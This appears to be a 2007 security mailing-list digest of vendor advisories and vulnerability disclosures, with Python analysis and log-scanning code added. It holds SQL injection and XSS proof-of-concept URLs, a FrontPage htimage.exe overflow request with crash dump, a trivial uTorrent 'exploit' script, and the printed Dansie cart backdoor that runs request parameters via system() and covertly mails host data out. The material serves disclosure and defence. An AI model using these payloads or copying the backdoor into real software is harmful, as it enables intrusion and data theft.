[ MDKSA-2007:110 ] - Updated php-pear packages fix directory traversal vulnerability
Mandriva Linux Security Advisory MDKSA-2007:110
http://www.mandriva.com/security/

Package  : php-pear
Date     : June 4, 2007
Affected : 2007.0, 2007.1, Corporate 3.0, Corporate 4.0

Problem Description:

A security hole was discovered in all versions of the PEAR Installer (http://pear.php.net/PEAR). The security hole is the most serious hole found to date in the PEAR Installer, and would allow a malicious package to install files anywhere in the filesystem.

The vulnerability only affects users who are installing an intentionally created package with a malicious intent. Because the package is easily traced to its source, this is most likely to happen if a hacker were to compromise a PEAR channel server and alter a package to install a backdoor. In other words, it must be combined with other exploits to be a problem.

Updated packages have been patched to prevent this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2519

Updated Packages:

Per-release package lists and MD5 checksums for Mandriva Linux 2007.0, 2007.1, Corporate 3.0 and Corporate 4.0 are available from http://www.mandriva.com/security/advisories.

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
Disinfectors for the calculator virus (ti89.Gaara)
Hey,

For those who are interested, I made two types of Gaara (the calculator virus) disinfectors. The first one patches the virus body, which causes it to return control to the host just when the EPO injection transfers control to the virus, so the virus will not get executed at all. The second one tries to find an EPO injection by searching for BRA opcodes and testing them for suitable conditions.

Here are the codes:

Dis1:
Source: http://piotrbania.com/all/ti89/dis1.c
Binary: http://piotrbania.com/all/ti89/dis1.89z

Dis2:
Source: http://piotrbania.com/all/ti89/dis2.c
Binary: http://piotrbania.com/all/ti89/dis2.89z

I hope you will find them somehow interesting.

best regards,
pb

--
Piotr Bania - <[EMAIL PROTECTED]> - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33
http://www.piotrbania.com - Key ID: 0xBE43AC33
"The more I learn about men, the more I love dogs."
Unpatched input validation flaw in Firefox 2.0.0.4
Firefox 2.0.0.4 contains a fix for a directory traversal vulnerability that allowed you to read local files through the resource protocol. However, the patch only partially fixed the vulnerability on Windows systems and accidentally circumvents an existing input validation check.

The net result is that you can still read some local files on Windows and all user accessible files on Linux/Unix/OS X, with all user accessible files potentially readable as well on Windows through the patch regression.

http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/

Cheers
Thor Larholm
Re: [PLESK 7.5 Reload] & [PLESK 7.6 for MS Windows] path passing and disclosure vulnerability
I tried this on my server and it doesn't seem to work - it asks me to login.
RE: bugtraq submission
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> Sent: Friday, June 01, 2007 12:50 PM
> To: bugtraq@securityfocus.com
> Subject: bugtraq submission
>
> There are numerous XSS vulnerabilities in PHPLive v3.2.2
> (Maybe others)

This vendor is incredibly non-responsive and apathetic about any security issue. I have yet to be contacted regarding previous issues and we often end up having to fix them ourselves. Anyone have better luck?

Warner
rPSA-2007-0115-1 libexif
rPath Security Advisory: 2007-0115-1
Published: 2007-06-04
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Denial of Service
Updated Versions:
libexif=/[EMAIL PROTECTED]:devel//1/0.6.15-0.1-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645
https://issues.rpath.com/browse/RPL-1431

Description:
Previous versions of the libexif package can cause applications to crash when loading malformed exif data. It is not currently known whether this vulnerability can be exploited to execute malicious code.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
rPSA-2007-0114-1 mutt
rPath Security Advisory: 2007-0114-1
Published: 2007-06-04
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local User Deterministic Privilege Escalation
Updated Versions:
mutt=/[EMAIL PROTECTED]:devel//1/1.4.2.3-0.1-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1558
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2683
http://dev.mutt.org/trac/ticket/2846
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=239890
https://issues.rpath.com/browse/RPL-1232
https://issues.rpath.com/browse/RPL-1391

Description:
In previous versions of the mutt package, it is possible for an attacker to subvert other local users' mutt processes, causing them to run attacker-provided code. Additionally, it is possible for a hostile server masquerading as a user's APOP server to determine some characters from a user's password.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
SYM07-009, Symantec Storage Foundation for Windows Volume Manager: Authentication Bypass and Potential Code Execution in Scheduler Service
Symantec Security Advisory
http://www.symantec.com/avcenter/security/Content/2007.06.01.html

SYM07-009
1 June, 2007

Symantec Storage Foundation for Windows Volume Manager: Authentication Bypass and Potential Code Execution in Scheduler Service

Revision History: None
Severity: Medium
Remote Access: Yes, local network access required
Local Access: No
Authentication Required: No
Exploit publicly available: No

Overview

An authentication bypass, remote code execution vulnerability has been identified and resolved in the Symantec Storage Foundation for Windows v5.0 Volume Manager Scheduler Service. Successful exploitation could result in potential compromise of the targeted system.

Product(s) Affected

Product: Symantec Storage Foundation for Windows
Version: 5.0
Solution(s): http://support.veritas.com/docs/288627

Product(s) Not Affected

Symantec Storage Foundation for Windows 3.1
Symantec Storage Foundation for Windows 4.1, 4.1RP1
Symantec Storage Foundation for Windows 4.2, 4.2RP1, 4.2RP2

Details

3Com's Zero Day Initiative notified Symantec of an authentication bypass and arbitrary code execution vulnerability discovered in the Symantec Storage Foundation for Windows Scheduler Service, VxSchedService.exe. The Scheduler Service server, initially introduced in Symantec Storage Foundation for Windows v5.0, listens for incoming scheduling messages from client systems. An attacker with network access who could successfully connect directly to the Scheduler Service socket could bypass the built-in authentication in the management console. By properly manipulating this vector, the attacker has the potential to add arbitrary commands to the registry that could be executed during normal scheduled runs.

This vulnerability, if successfully exploited, would most likely be initiated by a malicious user authenticated on the local network, since the affected service port should not normally be available to other than authorized network systems. Any potentially successful attack by a non-authorized remote attacker would most likely be a scenario of enticing an authorized user to run, or allow to run, malicious code that might successfully exploit this issue.

Symantec Response

Symantec takes the security of our products and our customers very seriously. Symantec engineers have verified and corrected this issue in Symantec's Storage Foundation for Windows 5.0. Updates are available for supported products.

Symantec recommends customers apply the latest product update available for their supported product versions to enhance their security posture and protect against potential security threats of this nature.

Symantec knows of no exploitation of or adverse customer impact from this issue.

The patches listed above for affected product/version are available from the following location:
http://support.veritas.com/docs/288627

Best Practices

As part of normal best practices, Symantec strongly recommends:

* Restrict access to administration or management systems to privileged users.
* Restrict remote access, if required, to trusted/authorized systems only.
* Run under the principle of least privilege where possible to limit the impact of exploit by threats.
* Keep all operating systems and applications updated with the latest vendor patches.
* Follow a multi-layered approach to security. Run both firewall and anti-malware applications, at a minimum, to provide multiple points of detection and protection to both inbound and outbound threats.
* Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in detection of attacks or malicious activity related to exploitation of latent vulnerabilities.

CVE

The Common Vulnerabilities and Exposures (CVE) initiative has assigned CVE Candidate CVE-2007-2279 to this issue. This issue is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

Credit: Symantec would like to thank 3Com/ZDI for reporting this issue and for providing full coordination while Symantec resolved it.
FLEA-2007-0024-1: libexif
Foresight Linux Essential Advisory: 2007-0024-1
Published: 2007-06-04
Rating: Moderate
Updated Versions:
libexif=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/0.6.15-0.1-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3-0.1-6

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645
https://issues.rpath.com/browse/RPL-1431

Description:
Previous versions of the libexif package were vulnerable to an integer overflow when loading EXIF data, which could cause a crash (denial of service) or potentially allow the attacker to execute arbitrary code at the permission level of the user running a program which uses libexif.

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html
[SECURITY] [DSA 1291-4] New samba packages fix regression
Debian Security Advisory DSA 1291-4                        [EMAIL PROTECTED]
http://www.debian.org/security/                          Moritz Muehlenhoff
June 4th, 2007                          http://www.debian.org/security/faq

Package        : samba
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-2444 CVE-2007-2446 CVE-2007-2447

The security update for CVE-2007-2446 introduced a regression, which broke connection to domain member servers in some scenarios. This update fixes this regression.

For the stable distribution (etch), this regression has been fixed in version 3.0.24-6etch4.

The old stable distribution (sarge) is not affected by this problem.

For the unstable distribution (sid) this regression has been fixed in version 3.0.25a-1.

We recommend that you upgrade your samba package.

Upgrade Instructions

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
n.runs-SA-2007.014 - F-Secure Antivirus ARJ parsing Infinite Loop Advisory
n.runs AG
http://www.nruns.com/
security(at)nruns.com

n.runs-SA-2007.014                                            04-Jun-2007

Vendor: F-Secure Corporation, http://www.f-secure.com

Affected Products:
F-Secure Anti-Virus for Workstations version 7.00 and earlier
F-Secure Anti-Virus for Windows Servers version 7.00 and earlier
F-Secure Anti-Virus for Citrix Servers version 5.52
F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier
F-Secure Anti-Virus Client Security version 7.00 and earlier
F-Secure Anti-Virus for MS Exchange version 7.00 and earlier
F-Secure Internet Gatekeeper version 6.60 and earlier
F-Secure Internet Security 2005, 2006 and 2007
F-Secure Anti-Virus 2005, 2006 and 2007
Solutions based on F-Secure Protection Service for Consumers version 7.00 and earlier
F-Secure Anti-Virus for Linux Servers version 4.65 and earlier
F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier
F-Secure Anti-Virus Linux Client Security 5.52 and earlier
F-Secure Anti-Virus Linux Server Security 5.52 and earlier
F-Secure Internet Gatekeeper for Linux 2.16 and earlier

Vulnerability: Infinite Loop DoS (remote)
Risk: HIGH

Vendor communication:
2007/05/07  initial notification to F-Secure Corporation
2007/05/08  F-Secure Corporation response
2007/05/08  PGP public keys exchange
2007/05/08  PoC files sent to F-Secure Corporation
2007/05/14  F-Secure Corporation acknowledged the PoC files
2007/05/18  F-Secure Corporation validated the vulnerability
2007/05/18  F-Secure Corporation notified update release date
2007/05/30  F-Secure Corporation released update with fixes

Overview:
F-Secure Corporation protects consumers and businesses against computer viruses and other threats from the Internet and mobile networks. F-Secure award-winning solutions are available for workstations, gateways, servers and mobile phones. They include antivirus and desktop firewall with intrusion prevention, antispam and antispyware solutions, as well as network control solutions for Internet Service Providers. F-Secure protection is also available as a service through major ISPs, such as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is the global market leader in mobile phone protection provided through mobile operators, such as T-Mobile and Swisscom, and mobile handset manufacturers such as Nokia.

Description:
A remotely exploitable vulnerability has been found in the file parsing engine. In detail, the following flaw was determined:

- Infinite Loop in .ARJ file parsing

Impact:
This problem can lead to remote denial of service provoked by high CPU consumption and exhaustion of storage resources if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in the F-Secure Corporation software products listed above on all platforms supported by the affected products.

Solution:
The vulnerability was reported on 07.May.2007 and an update has been issued on 30.May.2007 to solve this vulnerability. For detailed information about the fixes follow the link in the References [1] section of this document.

Credit:
Bugs found by Sergio Alvarez of n.runs AG.

References:
[1] http://www.f-secure.com/security/fsc-2007-3.shtml

This Advisory and Upcoming Advisories:
http://www.nruns.com/parsing-engines-advisories.php

Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact [EMAIL PROTECTED] for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages.

Copyright 2007 n.runs AG. All rights reserved. Terms of apply.
My Datebook SQL Injection + XSS
Application: My Datebook
Web Sites: http://mealex.com/scripts.html http://www.theadminshop.com/
Versions: any (no version numbers can be found)
Platform: linux, windows, freebsd, sun
Bug: SQL Injection + XSS
Severity: High (since there is no need to authenticate.)
Fix Available: No

---
1) Introduction
2) Bug
3) The Code
4) Fix
5) About
6) Disclaimer

=== 1) Introduction ===

"My DataBook is a simple, php & mysql personal organizer."

== 2) Bug ==

Many SQL Injections and many XSS.

=== 3) Proof of concept ===

The file diary.php is subject to several SQL Injections. Some examples are:

http://site/apppath/diary.php?month=06&year=2007&day=01&delete=%27
http://site/apppath/diary.php?month=06&year=2007&day=01&delete=%00'

XSS example:

http://site/apppath/diary.php?Sec=diary&month=06&year=alert(123123123)%3B&day=01

= 4) Fix =

The author's email or contact details were not available. If you are using this software, try to fix it yourself or change it.

== 5) About Serapis.net ==

www.Serapis.net is a portal dedicated to web defacements, tracking defacements around the world.

== 6) Disclaimer ==

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

http://www.serapis.net
http://calima.serapis.net/blogs/
n.runs-SA-2007.015 - F-Secure Antivirus FSG packed files parsing Infinite Loop Advisory
n.runs AG
http://www.nruns.com/
security(at)nruns.com

n.runs-SA-2007.015                                            04-Jun-2007

Vendor: F-Secure Corporation, http://www.f-secure.com

Affected Products:
F-Secure Anti-Virus for Workstations version 7.00 and earlier
F-Secure Anti-Virus for Windows Servers version 7.00 and earlier
F-Secure Anti-Virus for Citrix Servers version 5.52
F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier
F-Secure Anti-Virus Client Security version 7.00 and earlier
F-Secure Anti-Virus for MS Exchange version 7.00 and earlier
F-Secure Internet Gatekeeper version 6.60 and earlier
F-Secure Internet Security 2005, 2006 and 2007
F-Secure Anti-Virus 2005, 2006 and 2007
Solutions based on F-Secure Protection Service for Consumers version 7.00 and earlier
F-Secure Anti-Virus for Linux Servers version 4.65 and earlier
F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier
F-Secure Anti-Virus Linux Client Security 5.52 and earlier
F-Secure Anti-Virus Linux Server Security 5.52 and earlier
F-Secure Internet Gatekeeper for Linux 2.16 and earlier

Vulnerability: Infinite Loop DoS (remote)
Risk: HIGH

Vendor communication:
2007/05/07  initial notification to F-Secure Corporation
2007/05/08  F-Secure Corporation response
2007/05/08  PGP public keys exchange
2007/05/08  PoC files sent to F-Secure Corporation
2007/05/14  F-Secure Corporation acknowledged the PoC files
2007/05/18  F-Secure Corporation validated the vulnerability
2007/05/18  F-Secure Corporation notified update release date
2007/05/30  F-Secure Corporation released update with fixes

Overview:
F-Secure Corporation protects consumers and businesses against computer viruses and other threats from the Internet and mobile networks. F-Secure award-winning solutions are available for workstations, gateways, servers and mobile phones. They include antivirus and desktop firewall with intrusion prevention, antispam and antispyware solutions, as well as network control solutions for Internet Service Providers. F-Secure protection is also available as a service through major ISPs, such as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is the global market leader in mobile phone protection provided through mobile operators, such as T-Mobile and Swisscom, and mobile handset manufacturers such as Nokia.

Description:
A remotely exploitable vulnerability has been found in the file parsing engine. In detail, the following flaw was determined:

- Infinite Loop in FSG packed file parsing

Impact:
This problem can lead to remote denial of service provoked by high CPU consumption and exhaustion of storage resources if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in the F-Secure Corporation software products listed above on all platforms supported by the affected products.

Solution:
The vulnerability was reported on 07.May.2007 and an update has been issued on 30.May.2007 to solve this vulnerability. For detailed information about the fixes follow the link in the References [1] section of this document.

Credit:
Bugs found by Sergio Alvarez of n.runs AG.

References:
[1] http://www.f-secure.com/security/fsc-2007-3.shtml

This Advisory and Upcoming Advisories:
http://www.nruns.com/parsing-engines-advisories.php

Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact [EMAIL PROTECTED] for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages.

Copyright 2007 n.runs AG. All rights reserved. Terms of apply.
Re: Buffer overflow in BusinessMail email server system 4.60.00
[EMAIL PROTECTED] wrote:

This problem was corrected within 14 days, and a new SMTP server was provided on our web site. This was back in 2005, we are now almost TWO YEARS ON, and you still claim it is a problem.

It is unclear who "you" is supposed to be here. I'm guessing this is the vulnerability referred to by:

OSVDB 18407
CVE 2005-2472
ISS 21636
Secunia 16306
Bugtraq 14434

None of these indicate a solution is available. The Mail List post reporting this vulnerability was http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0002.html

In the post, it says that a patch will soon be available. A quick glance at the download page at http://www.netcplus.com/downloads.html doesn't reveal a link to download the patch for 4.6. I also don't see any advisory for users of 4.6 that a patch is available.

We will be happy to update our entry at osvdb.org, after verifying that a patch exists for 4.6, and an upgrade to 4.7 also solves the problem. Is that correct?

Thanks,
Steve Tornio
osvdb.org

You **were** notified of the release of the fix, and we have many other confirmations that it is indeed a good fix. We are now at 4.7 of BusinessMail, and that also still blocks this "vulnerability", and yet you continue to publish out of date and inaccurate information as being the truth. Kindly update your published information as relevant to reflect the true facts of this buglet. You can download an evaluation BusinessMail system from our web site to test this for yourself if you still do not believe us.

Thank You
uTorrent overflow
#!/bin/bash
#
# uTorrent overflow
# mail: dj.r4iden[at]gmail.com
# greet to : StrikerX , St0rM-MaN , MedoZero , hack_egy ,CPU
# you must know the victim ip and the port he uses in uTorrent
#
clear
echo "Enter your victam IP?"
echo " "
read victamIP
victamIP=$victamIP
echo " Enter your victam port?"
echo " "
read victamport
victamport=$victamport
echo "after you connect hold the enter key"
echo -n "you wanna connect now?(y/n)"
read X
if [ "$X" = "y" ];then
    telnet $victamIP $victamport
elif [ "$X" = "n" ];then
    echo " good bye"
    echo -n "exploit by dj.r4iden[at]gmail.com"
fi
Recent OpenSSL exploits
Has anyone seen anything floating around for the OpenSSL SSL_Get_Shared_Ciphers Buffer Overflow (CVE-2006-3738/Bugtraq ID 20249)? I've been told there is one that has recently been floating around with blackhats, but I'm unable to confirm/deny. Ryan
CERN Image Map Dispatcher
CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs in "htimage.exe":

1) Gives us the full path to the root directory
2) Simple buffer overflow
3) Allows us to access files.

Problem #1
~~~~~~~~~~

Like I said, the first bug gives us the full path to the root directory. I tested this vulnerability against some servers; all were vulnerable!

Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 4.0.2.2717, 2.0.1.927, 3.0.2.926, 3.0.2.1105, 3.0.2.1330, 3.0.2.1117

(All Windows based web servers are vulnerable if we have permission to execute "htimage.exe" and "htimage.exe" exists.)

To test this vulnerability we need "htimage.exe" in our "cgi-bin" directory (it's installed by default) and permission to execute it. That's why only Windows is vulnerable; Unix based systems can't execute "*.exe" files.

If we access "htimage.exe" using our favorite web browser like:

http://server/cgi-bin/htimage.exe/linux?0,0

we get this error:

---
Error
Error calling HTImage: Picture config file not found, tried the following:
q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
---

Now we know that the path to the root directory is "q:/hidden_directory_because_of_the_script_kiddies/webroot/".

Problem #2
~~~~~~~~~~

Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and "FrontPage-PWS32".

Tested / Vulnerable OS: Windows'95/98

"htimage.exe" buffer overflows if we access it like:

http://server/cgi-bin/htimage.exe/<741 A's>?0,0

---
HTIMAGE caused an invalid page fault in module at :41414141.
Registers:
EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=
Bytes at CS:EIP:
Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
---
+ <500 Server Error>

First remote FrontPage exploit?

Problem #3
~~~~~~~~~~

It's not a serious bug. Using "htimage.exe" we can access files on the server, but we can't read them. Accessing "htimage.exe" like:

http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0

outputs:

---
Error
Error calling HTImage: HTImage.c: Syntax error at line 1
Bad field name, expecting 'default', 'rectangle', 'circle' or 'polygon' (got an alphanumeric string)
---

NOTE: Accessing "/_vti_pvt/service.pwd" directly outputs: 403 Forbidden

Solution

1) Remove "htimage.exe".
2) Do not use FrontPage, simple enough :)
Dansie Cart Script Exploit Reported
Synopsis: This program -deliberately- allows arbitrary commands to be executed on the victim server.

One of our clients, while installing and configuring the Dansie Shopping Cart, ran into difficulty integrating PGP, the shopping cart program, and our secure server setup. While trying to assist our client with the cart and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the Dansie shopping cart software, '[EMAIL PROTECTED]'. This is not readily apparent as the code that handles this transaction incorporates a simple Caesar Cipher to hide the email address. The cipher is handled via the subroutine 'there2':

---
sub there2 {
    $_ = "$_[0]";
    tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
    tr/_/-/;
    tr/\@/\./;
    return $_;
}
---

The call that creates this email address and sends the mail is the function 'there3'.

---
sub there3 {
    if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog")) {
        $a = &there2('8v59')."\@". &there2('kte3cv').".". &there2('ev8');
        $b = &there2('8v59_3jhhzi8');
        pop(@there2);
        pop(@there2);
        $c = &there2("@there2");
        open (TECH, "|$mailprog $a");
        print TECH "To: $a\n";
        print TECH "From: $a\n";
        print TECH "Subject: $b\n\n";
        print TECH "$path3\n";
        print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
        print TECH "$c\n";
        print TECH "$e $there\n" if ($e);
        close (TECH);
    }
}
---

The ciphered strings, when passed through 'there2', result in:

8v59         == tech
kte3cv       == dansie
ev8          == net
8v59_3jhhzi8 == tech-support
$a           == [EMAIL PROTECTED]
$b           == Subject: tech-support

This seems curious, but plausible reasons could include ensuring license compliance, or maybe the cart automatically sends this email when an error occurs. The program definitely goes out of its way to hide the fact that the mail is being sent.

While going through the rest of the code we discovered a much more interesting item. (We've masked out the actual trigger element with question marks)

---
if ( ( ( $FORM{'?'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?'} ) && (!$d) ) ) {
    if ( $ENV{'OS'} ) {
        system("$FORM{'?'}");
    } else {
        open(ELIF,"|$FORM{'?'}");
    }
    exit;
}
---
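Two things an analyst would want to reproduce from the post above: that the `tr///` table in 'there2' really does decode to the strings the authors list, and that the quoted trigger block hands a request parameter straight to a shell. The following is hypothetical analyst code added for this page, not code from the Dansie cart or from the post; the substitution table is copied from 'there2', and the sample Perl scanned is the trigger block as quoted (parameter name still masked as '?').

```python
"""Re-checking the Dansie findings: decode the there2() literals and flag the
request-to-shell pattern. Hypothetical analyst code added for this page; it is
not part of the cart."""
import re

# there2() is  tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/; tr/_/-/; tr/\@/\./;
# a fixed monoalphabetic substitution, so one translation table reproduces it.
_SRC = "abcdefghijklmnopqrstuvwxyz0123456789" + "_@"
_DST = "gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth" + "-."
_THERE2 = str.maketrans(_SRC, _DST)


def there2(s: str) -> str:
    """Apply the same substitution as the cart's there2()."""
    return s.translate(_THERE2)


def decode_there3_literals() -> dict:
    """Decode the literals there3() uses to build the hidden address and subject."""
    user, host, tld = there2("8v59"), there2("kte3cv"), there2("ev8")
    return {
        "user": user,
        "host": host,
        "tld": tld,
        "subject": there2("8v59_3jhhzi8"),
        # mirrors  $a = &there2('8v59')."\@". &there2('kte3cv').".". &there2('ev8')
        "address": f"{user}@{host}.{tld}",
    }


# Perl constructs that hand a request parameter straight to a shell.
_SHELL_SINKS = (
    ("system() on a $FORM value", re.compile(r'system\s*\(\s*"?\$FORM\{')),
    ("pipe-open on a $FORM value", re.compile(r'open\s*\([^,]+,\s*"\|\s*\$FORM\{')),
)


def find_request_to_shell(perl_src: str) -> list:
    """Return (line number, description) for each line feeding $FORM{...} into a shell."""
    hits = []
    for no, line in enumerate(perl_src.splitlines(), 1):
        for desc, rx in _SHELL_SINKS:
            if rx.search(line):
                hits.append((no, desc))
    return hits


# The trigger block quoted in the post, with the parameter name masked as '?' as there.
SAMPLE = r"""
if ( ( ( $FORM{'?'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?'} ) && (!$d) ) ) {
    if ( $ENV{'OS'} ) {
        system("$FORM{'?'}");
    } else {
        open(ELIF,"|$FORM{'?'}");
    }
    exit;
}
"""

if __name__ == "__main__":
    for key, value in decode_there3_literals().items():
        print(f"{key:8} {value}")
    for no, desc in find_request_to_shell(SAMPLE):
        print(f"line {no}: {desc}")
```

The decoder confirms the four listed strings; the scanner is the kind of grep-level check worth running over any third-party CGI before deployment, since `system("$FORM{...}")` and `open(FH, "|$FORM{...}")` with request-controlled input are command execution whatever the surrounding condition is.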
2007-06-03: PeerCast streaming server submits cleartext password
Hi there,

peercast also submits the configured password in cleartext, e.g.:

http://www.domain.tld:7144/admin?cmd=login&pass=asdfg.jodi.org&submit=Login

Well, I have just played a bit around with it, so I assume this is already known. A solution might be to use stunnel.

Have Fun :)

Greetz
mpeg
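Both the htimage.exe post and the PeerCast note above leave a trace in ordinary web server access logs: an absurdly long PATH_INFO after htimage.exe (the crash used 741 bytes) or a request pointing the dispatcher at /_vti_pvt/, and a login password carried in a GET query string. The following is hypothetical detection code added for this page, not taken from either post; the log lines are constructed, and the 128-byte PATH_INFO threshold is a choice made for the example.

```python
"""Access-log checks for the htimage.exe and PeerCast findings above.

Hypothetical detection code added for this page, not from either post. It scans
common-log-format lines and flags (a) htimage.exe requests whose PATH_INFO is far
longer than a map file name or points the dispatcher into /_vti_pvt/, and
(b) any query string that carries a credential parameter such as 'pass'."""
import re
from urllib.parse import parse_qsl, urlsplit

# client, method, request target and status from a common-log-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

HTIMAGE = "/cgi-bin/htimage.exe"
PATH_INFO_LIMIT = 128                 # threshold chosen for this example; real map names are short
CREDENTIAL_PARAMS = {"pass", "passwd", "password", "pwd"}


def check_request(target: str) -> list:
    """Return finding strings for one request target (path plus optional query)."""
    findings = []
    parts = urlsplit(target)
    path = parts.path
    idx = path.lower().find(HTIMAGE)
    if idx != -1:
        path_info = path[idx + len(HTIMAGE):]
        if len(path_info) > PATH_INFO_LIMIT:
            findings.append(f"htimage.exe PATH_INFO of {len(path_info)} bytes")
        if "/_vti_pvt/" in path_info.lower():
            findings.append("htimage.exe pointed at /_vti_pvt/")
    for name, _value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in CREDENTIAL_PARAMS:
            findings.append(f"credential parameter '{name}' sent in URL query")
    return findings


def scan_log(lines) -> list:
    """Return (client, finding) pairs for every flagged request in the log."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        out.extend((client, f) for f in check_request(target))
    return out


# Constructed log lines (private and documentation-range addresses).
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jun/2007:10:00:01 +0000] "GET /cgi-bin/htimage.exe/linux?0,0 HTTP/1.0" 200 312',
    '10.0.0.5 - - [04/Jun/2007:10:00:07 +0000] "GET /cgi-bin/htimage.exe/' + "A" * 741 + '?0,0 HTTP/1.0" 500 0',
    '10.0.0.5 - - [04/Jun/2007:10:00:09 +0000] "GET /cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0 HTTP/1.0" 200 250',
    '192.0.2.7 - - [04/Jun/2007:10:05:00 +0000] "GET /admin?cmd=login&pass=EXAMPLE-PASSWORD&submit=Login HTTP/1.1" 200 1024',
    '192.0.2.9 - - [04/Jun/2007:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, finding in scan_log(SAMPLE_LOG):
        print(f"{client:12} {finding}")
```

The credential check is also a reminder that a password in a query string ends up in the server log itself (and in any proxy between), which is the second reason, beside the cleartext transport, to move such logins to a POST body over TLS.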
Redlevel Advisory #025 - Vonage VoIP Telephone Adapter Default Misconfiguration
Vonage VoIP Telephone Adapter Default Misconfiguration

The Vonage VoIP Telephone Adapter device is, by default, accessible from the WLAN/internet. The product ships with the default username of 'user' and default password of 'user' to access the administrative backend. Users are advised to update their passwords immediately.

An attacker could cause a denial-of-service by uploading broken firmware to the device, or by constantly rebooting the device.

John Martinelli
[EMAIL PROTECTED]
http://RedLevel.org
RedLevel.org Security
Re: Buffer overflow in BusinessMail email server system 4.60.00
